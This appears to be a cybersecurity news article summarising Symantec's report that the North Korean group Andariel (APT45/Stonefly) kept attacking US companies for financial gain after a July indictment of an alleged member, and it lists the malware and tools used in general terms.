APT45 Ignores US Threats: Financial Gain Fuels Ongoing Cyberattacks

Symantec experts have discovered that the North Korean group Andariel (also known as Stonefly, APT45, Silent Chollima, Onyx Sleet) continues to target organizations in the United States for financial gain, despite the charges brought against them and the reward announced for their capture.

In August, Symantec detected intrusions into three U.S. companies, a month after the indictment was made public. Although the hackers were unable to deploy ransomware within the victims’ networks, their actions were financially motivated. All the targeted companies are private and engaged in commercial activities with no apparent intelligence value.

During the attacks, Stonefly utilized its proprietary malware Backdoor.Preft (also known as Dtrack or Valefor), which allows the downloading of files, command execution, and plugin installation. Indicators of compromise, recently documented by Microsoft, were also identified, including a forged Tableau certificate.

To maintain access to compromised systems, Stonefly employed other tools as well. For instance, the Nukebot backdoor, which, in addition to Backdoor.Preft’s functionality, can also take screenshots. Although Nukebot had not previously been linked to Andariel, the malware’s source code leak enabled the group to use it. The attackers also ran scripts to store passwords in plain text and deployed Mimikatz, configuring the tool to collect credentials.

Two distinct keyloggers were identified during the attacks:

• The first stole clipboard data, logged program launches and keystrokes, and archived and encrypted the collected information.
• The second also had the capability to steal clipboard data, saving the information in a randomly named DAT file in the temporary directory.

Additionally, the attackers used tunneling tools (Chisel), SSH clients (PuTTY, Plink), cloud storage utilities (Megatools), and data visualization tools (Snap2HTML).

On July 25, the U.S. Department of Justice indicted North Korean national Rim Chong Hyok, a suspected member of the Stonefly group, which is believed to be linked to North Korea’s Reconnaissance General Bureau (RGB). Rim Chong Hyok was charged with extorting American hospitals and other medical institutions between 2021 and 2023, laundering ransom payments, and financing subsequent cyberattacks on organizations in the defense, technology, and government sectors.